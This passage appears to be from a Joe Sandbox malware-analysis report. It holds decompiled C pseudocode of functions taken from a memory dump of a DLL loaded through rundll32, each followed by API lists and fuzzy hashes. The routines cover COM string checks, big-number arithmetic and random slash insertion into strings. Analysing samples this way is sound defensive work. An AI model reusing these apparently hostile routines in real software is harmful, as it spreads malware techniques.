                                				intOrPtr* _t87;
                                				intOrPtr _t103;
                                				intOrPtr _t109;
                                				void* _t118;
                                				void* _t122;
                                				void* _t123;
                                				intOrPtr _t130;
                                
                                				_t123 = _t122 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t118 >= 0) {
                                					_t54 = _v8;
                                					_t103 =  *0x106a348; // 0x409d5a8
                                					_t5 = _t103 + 0x106b038; // 0x3050f485
                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                					if(_t118 >= 0) {
                                						__imp__#2(0x1069290);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t118 = 0x8007000e;
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                							_t87 = __imp__#6;
                                							_t118 = _t61;
                                							if(_t118 >= 0) {
                                								_t63 = _v24;
                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                								if(_t118 >= 0) {
                                									_t130 = _v20;
                                									if(_t130 != 0) {
                                										_t67 = 3;
                                										_v64 = _t67;
                                										_v48 = _t67;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t130 > 0) {
                                											while(1) {
                                												_t68 = _v24;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t123 = _t123;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                												if(_t118 < 0) {
                                													goto L16;
                                												}
                                												_t70 = _v8;
                                												_t109 =  *0x106a348; // 0x409d5a8
                                												_t28 = _t109 + 0x106b0bc; // 0x3050f1ff
                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                												if(_t118 >= 0) {
                                													_t75 = _v16;
                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                													if(_t118 >= 0 && _v12 != 0) {
                                														_t79 =  *0x106a348; // 0x409d5a8
                                														_t33 = _t79 + 0x106b078; // 0x76006f
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t83 = _v16;
                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                														}
                                														 *_t87(_v12);
                                													}
                                													_t77 = _v16;
                                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                												}
                                												_t72 = _v8;
                                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                							}
                                							 *_t87(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                					}
                                				}
                                				return _t118;
                                			}





































                                0x01062737
                                0x01062740
                                0x01062741
                                0x01062745
                                0x0106274b
                                0x01062751
                                0x0106275a
                                0x01062760
                                0x0106276a
                                0x0106276c
                                0x01062772
                                0x01062777
                                0x01062782
                                0x01062788
                                0x0106278d
                                0x010628af
                                0x01062793
                                0x01062793
                                0x010627a0
                                0x010627a6
                                0x010627ac
                                0x010627b0
                                0x010627b6
                                0x010627c3
                                0x010627c7
                                0x010627cd
                                0x010627d0
                                0x010627d8
                                0x010627d9
                                0x010627dd
                                0x010627e1
                                0x010627e4
                                0x010627e7
                                0x010627ed
                                0x010627f6
                                0x010627fc
                                0x010627fd
                                0x01062800
                                0x01062801
                                0x01062802
                                0x0106280a
                                0x0106280b
                                0x0106280c
                                0x0106280e
                                0x01062812
                                0x01062816
                                0x00000000
                                0x00000000
                                0x0106281c
                                0x01062825
                                0x0106282b
                                0x01062835
                                0x01062839
                                0x0106283b
                                0x01062848
                                0x0106284c
                                0x01062854
                                0x01062859
                                0x0106286b
                                0x0106286d
                                0x01062873
                                0x01062873
                                0x0106287c
                                0x0106287c
                                0x0106287e
                                0x01062884
                                0x01062884
                                0x01062887
                                0x0106288d
                                0x01062890
                                0x01062899
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01062899
                                0x010627ed
                                0x010627e7
                                0x010627d0
                                0x0106289f
                                0x0106289f
                                0x010628a5
                                0x010628a5
                                0x010628ab
                                0x010628ab
                                0x010628b4
                                0x010628ba
                                0x010628ba
                                0x01062777
                                0x010628c3

                                APIs
                                • SysAllocString.OLEAUT32(01069290), ref: 01062782
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 01062863
                                • SysFreeString.OLEAUT32(00000000), ref: 0106287C
                                • SysFreeString.OLEAUT32(?), ref: 010628AB
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 3d616a7ab8fd1b1d2904bed11836cabb09a910ce86ae06de5b61c70845e0de23
                                • Instruction ID: 134c41297341225ee38a491cdf883c81d430a19d0bdc38328b6cdb4971a55aa1
                                • Opcode Fuzzy Hash: 3d616a7ab8fd1b1d2904bed11836cabb09a910ce86ae06de5b61c70845e0de23
                                • Instruction Fuzzy Hash: 60514E75D0051AEFCB10DFA8C888DEEB7B9EF88705B144598F955EB224D731AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 01065BD8
                                • SysFreeString.OLEAUT32(00000000), ref: 01065CBD
                                  • Part of subcall function 01062732: SysAllocString.OLEAUT32(01069290), ref: 01062782
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 01065D10
                                • SysFreeString.OLEAUT32(00000000), ref: 01065D1F
                                  • Part of subcall function 01063A62: Sleep.KERNEL32(000001F4), ref: 01063AAA
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 35c4a39346121bd5e93f8a9776a176f90e3709bd220ee8003d35ba3ba6ff8624
                                • Instruction ID: 63a935bc3c4fe00ae0e9ffab39c24aed2834a5ca645c25216fe9eba37c8efc1b
                                • Opcode Fuzzy Hash: 35c4a39346121bd5e93f8a9776a176f90e3709bd220ee8003d35ba3ba6ff8624
                                • Instruction Fuzzy Hash: BE519535500609EFDB11DFA8C844ADEB7BAFF88750F148468E985DB264DB35DD06CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E01061DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v156;
                                				void _v428;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E01062FAB(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E01061CC1(_t79,  &_v428);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01062920(_t101,  &_v428, _a8, _t96 - _t81);
                                					E01062920(_t79,  &_v156, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                					_t66 = E01061CC1(_t101,  &E0106A1D0);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E01061CC1(_a16, _a4);
                                						E01063ADA(_t79,  &_v428, _a4, _t97);
                                						memset( &_v428, 0, 0x10c);
                                						_t55 = memset( &_v156, 0, 0x84);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L0106824A();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L01068244();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                						_a12 = _t74;
                                						_t76 = E0106241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v156;
                                							if(E01062378(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E010679CC(_t79,  &_v156, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(_a8 * 4 +  &E0106A1D0) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}





















                                0x01061de6
                                0x01061df2
                                0x01061df8
                                0x01061dfd
                                0x01061e01
                                0x01061f73
                                0x01061f77
                                0x01061f77
                                0x01061e07
                                0x01061e0b
                                0x01061e0f
                                0x01061e12
                                0x01061e1d
                                0x01061e23
                                0x01061e28
                                0x01061e2b
                                0x01061e45
                                0x01061e54
                                0x01061e60
                                0x01061e6a
                                0x01061e6f
                                0x01061e71
                                0x01061e74
                                0x01061f2b
                                0x01061f31
                                0x01061f42
                                0x01061f55
                                0x01061f6b
                                0x00000000
                                0x01061f70
                                0x01061e7d
                                0x01061e84
                                0x01061e88
                                0x01061e8e
                                0x01061e90
                                0x01061e92
                                0x01061e94
                                0x01061e96
                                0x01061ea0
                                0x01061ea5
                                0x01061ea7
                                0x01061ea9
                                0x01061eaa
                                0x01061eab
                                0x01061eac
                                0x01061eb3
                                0x01061eba
                                0x01061ebd
                                0x01061ebd
                                0x01061e8a
                                0x01061e8a
                                0x01061e8a
                                0x01061ec5
                                0x01061ecd
                                0x01061ed9
                                0x01061ede
                                0x01061ede
                                0x01061ee3
                                0x00000000
                                0x00000000
                                0x01061ee5
                                0x01061ee8
                                0x01061ef5
                                0x00000000
                                0x00000000
                                0x01061ef7
                                0x01061ef7
                                0x01061f04
                                0x01061ede
                                0x01061ee3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01061ee3
                                0x01061f0e
                                0x01061f11
                                0x01061f14
                                0x01061f1b
                                0x01061f1b
                                0x01061f28
                                0x00000000
                                0x01061f28
                                0x01061e14
                                0x01061e18
                                0x01061e19
                                0x01061e1b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01061e1b
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01061E96
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01061EAC
                                • memset.NTDLL ref: 01061F55
                                • memset.NTDLL ref: 01061F6B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 6ad9974807f9f87f818ee7278f084fe33a8582ee111dea5c39d920b80d6337be
                                • Instruction ID: 41e7cc4ac7f356258c2e9e0c6bca192bda3ba323413b23a485bb53d010308ccd
                                • Opcode Fuzzy Hash: 6ad9974807f9f87f818ee7278f084fe33a8582ee111dea5c39d920b80d6337be
                                • Instruction Fuzzy Hash: BE419031A0021AAFDF10DF68DC84BEE77BDEF95310F004569F999A7280DB70AE548B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E0106264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E01066D63(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}














                                0x0106265b
                                0x0106265f
                                0x01062660
                                0x01062661
                                0x01062663
                                0x01062665
                                0x01062668
                                0x0106266d
                                0x01062704
                                0x0106270b
                                0x0106270b
                                0x01062676
                                0x0106267d
                                0x0106268d
                                0x0106268d
                                0x01062693
                                0x01062695
                                0x0106269a
                                0x010626a3
                                0x010626a9
                                0x010626ae
                                0x010626b9
                                0x010626bd
                                0x010626bf
                                0x010626c0
                                0x010626c9
                                0x010626cd
                                0x010626de
                                0x010626cf
                                0x010626d4
                                0x010626d9
                                0x010626e8
                                0x010626e8
                                0x010626bd
                                0x010626ee
                                0x010626f4
                                0x010626f4
                                0x010626fd
                                0x01062702
                                0x01062702
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 288da1361553302bceb97af133411bb01e94c9d4c8caec29e6509d971dade060
                                • Instruction ID: b0b22153a59337e4cc2a3633bbaa84a0ad937e3c337a5c0b59450e6052152ed6
                                • Opcode Fuzzy Hash: 288da1361553302bceb97af133411bb01e94c9d4c8caec29e6509d971dade060
                                • Instruction Fuzzy Hash: F9213D7990020AEFDB11DFA8C9849DEBBF9FF48214B1041A9F985E7210EB35DA44CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E01064162(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0x106a2d8, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0x106a2f0; // 0xc3cd870f
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0x106a2f0 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}

















                                0x0106416a
                                0x0106416d
                                0x01064173
                                0x0106418b
                                0x0106418d
                                0x01064192
                                0x01064194
                                0x01064197
                                0x01064199
                                0x0106419c
                                0x0106419e
                                0x0106419e
                                0x010641a0
                                0x010641ab
                                0x010641b0
                                0x010641c1
                                0x010641c9
                                0x010641ce
                                0x010641d1
                                0x010641d4
                                0x010641d6
                                0x010641d9
                                0x010641dc
                                0x010641dc
                                0x010641df
                                0x010641ea
                                0x010641ef
                                0x010641f9

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01061DC6,00000000,?,7477C740,010658D7,00000000,051095B0), ref: 0106416D
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 01064185
                                • memcpy.NTDLL(00000000,051095B0,-00000008,?,?,?,01061DC6,00000000,?,7477C740,010658D7,00000000,051095B0), ref: 010641C9
                                • memcpy.NTDLL(00000001,051095B0,00000001,010658D7,00000000,051095B0), ref: 010641EA
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: d8e5a1a7e96a819fdce7058e36924b59d0982989c73948136697a7285c403b98
                                • Instruction ID: eadd50a59a40cbb6ce285dc7b226f7832235d30e82a6042e0878b4d65b4e0d08
                                • Opcode Fuzzy Hash: d8e5a1a7e96a819fdce7058e36924b59d0982989c73948136697a7285c403b98
                                • Instruction Fuzzy Hash: 1A11C6B2A00216FFD7209B6DDC84E9A7FFEEB90261B050176F544DB150E7769E0487A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0106227F(void* __esi) {
                                				struct _SECURITY_ATTRIBUTES* _v4;
                                				void* _t8;
                                				void* _t10;
                                
                                				_v4 = 0;
                                				memset(__esi, 0, 0x38);
                                				_t8 = CreateEventA(0, 1, 0, 0);
                                				 *(__esi + 0x1c) = _t8;
                                				if(_t8 != 0) {
                                					_t10 = CreateEventA(0, 1, 1, 0);
                                					 *(__esi + 0x20) = _t10;
                                					if(_t10 == 0) {
                                						CloseHandle( *(__esi + 0x1c));
                                					} else {
                                						_v4 = 1;
                                					}
                                				}
                                				return _v4;
                                			}






                                0x01062289
                                0x0106228d
                                0x010622a2
                                0x010622a4
                                0x010622a9
                                0x010622af
                                0x010622b1
                                0x010622b6
                                0x010622c1
                                0x010622b8
                                0x010622b8
                                0x010622b8
                                0x010622b6
                                0x010622cf

                                APIs
                                • memset.NTDLL ref: 0106228D
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76DC81D0,00000000,00000000), ref: 010622A2
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010622AF
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0106593D,00000000,?), ref: 010622C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: f94584ebc4224b9bc35758913efeb31e21d2965567af977d0afbd507b04f2a2e
                                • Instruction ID: 608e945cd81b5f1a42c43b251f9ebda6b5515bac7ee96f759f6c53c05bbf9dd7
                                • Opcode Fuzzy Hash: f94584ebc4224b9bc35758913efeb31e21d2965567af977d0afbd507b04f2a2e
                                • Instruction Fuzzy Hash: FAF082B110470DBFE3206F66DCC4C3BBBECEB461ACB11496EF1C292511C676A8088BB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01067607() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x106a30c; // 0x2cc
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0x106a35c; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0x106a30c; // 0x2cc
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0x106a2d8; // 0x4d10000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}








                                0x01067607
                                0x0106760e
                                0x01067658
                                0x0106765a
                                0x0106765a
                                0x01067612
                                0x01067618
                                0x0106761d
                                0x01067621
                                0x01067627
                                0x0106762e
                                0x00000000
                                0x00000000
                                0x01067630
                                0x01067635
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01067635
                                0x01067637
                                0x0106763f
                                0x01067642
                                0x01067642
                                0x01067648
                                0x0106764f
                                0x01067652
                                0x01067652
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(000002CC,00000001,01065E70), ref: 01067612
                                • SleepEx.KERNEL32(00000064,00000001), ref: 01067621
                                • CloseHandle.KERNEL32(000002CC), ref: 01067642
                                • HeapDestroy.KERNEL32(04D10000), ref: 01067652
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 15dc208de6aa77e46e9600492a187b47d31bf0bb924d3809121f73c706cb9342
                                • Instruction ID: ed0248008e8ecbd8eb504a84994fab091be84d755aabd183d9fa4026944f505b
                                • Opcode Fuzzy Hash: 15dc208de6aa77e46e9600492a187b47d31bf0bb924d3809121f73c706cb9342
                                • Instruction Fuzzy Hash: D0F03071B41322DFFB306B3D984CA423BDCAB18669B044550FE80E36A8CB7AD844D760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E010672C7() {
                                				void* _v0;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				_t3 =  *0x106a3cc; // 0x51095b0
                                				__imp__( &(_t3[0x10]));
                                				while(1) {
                                					_t5 =  *0x106a3cc; // 0x51095b0
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t7 =  *0x106a3cc; // 0x51095b0
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x106b827) {
                                					HeapFree( *0x106a2d8, 0, _t10);
                                					_t7 =  *0x106a3cc; // 0x51095b0
                                				}
                                				 *_t7 = _v0;
                                				_t8 =  &(_t7[0x10]);
                                				__imp__(_t8);
                                				return _t8;
                                			}









                                0x010672c7
                                0x010672d0
                                0x010672e0
                                0x010672e0
                                0x010672e5
                                0x010672ea
                                0x00000000
                                0x00000000
                                0x010672da
                                0x010672da
                                0x010672ec
                                0x010672f1
                                0x010672f5
                                0x01067308
                                0x0106730e
                                0x0106730e
                                0x01067317
                                0x01067319
                                0x0106731d
                                0x01067323

                                APIs
                                • RtlEnterCriticalSection.NTDLL(05109570), ref: 010672D0
                                • Sleep.KERNEL32(0000000A), ref: 010672DA
                                • HeapFree.KERNEL32(00000000), ref: 01067308
                                • RtlLeaveCriticalSection.NTDLL(05109570), ref: 0106731D
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 074d65097f1f8433c26f59aa50f6ef54621e68bfebddeba1c208b63b9ff19d5c
                                • Instruction ID: 26092d240a44cff59e82da3c62e404100858a6d0d0286e8d474cacfdf7710b65
